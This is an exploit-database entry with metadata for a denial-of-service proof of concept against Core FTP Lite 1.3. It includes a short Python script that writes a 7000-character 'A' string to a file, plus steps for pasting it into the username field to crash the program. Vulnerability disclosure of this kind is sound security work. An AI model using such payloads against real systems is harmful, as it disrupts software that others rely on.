header-logo
Suggest Exploit
vendor:
Core FTP Lite
by:
Berat Isler
5.5
CVSS
MEDIUM
Denial of Service
400
CWE
Product Name: Core FTP Lite
Affected Version From: 1.3
Affected Version To: 1.3cBuild1437
Patch Exists: NO
Related CWE:
CPE: a:coreftp:core_ftp:1.3
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 32-bit
2020

Core FTP Lite 1.3 – Denial of Service (PoC)

The exploit script generates a payload and creates a file named "mi.txt" with the payload content. When this payload is pasted into the "username" field of the Core FTP application, it causes the application to crash.

Mitigation:

Apply vendor patches or updates to fix the vulnerability. Avoid using untrusted input.
Source

Exploit-DB raw data:

# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)
# Exploit Author: Berat Isler
# Date: 2020-02-20
# Vendor Homepage: http://www.coreftp.com/
# Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437
# Version: Core FTP 1.3cBuild1437
# Tested on : Windows 7 32-bit

# First step , Run exploit script, it will generate a new file with the name "mi.txt"
# Then start Core FTP application and find the "username" textbox.
# After that pate the content of "mi.txt" in to the "username" field like this --> "AAAAAAAAA"
# Don't need to click anything because application is already crash.

This is the code :


#!/usr/bin/python
    
b0f = "A" * 7000
payload = b0f
try:
    f=open("mi.txt","w")
    print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created :) "
except:
    print "File cannot be created :(("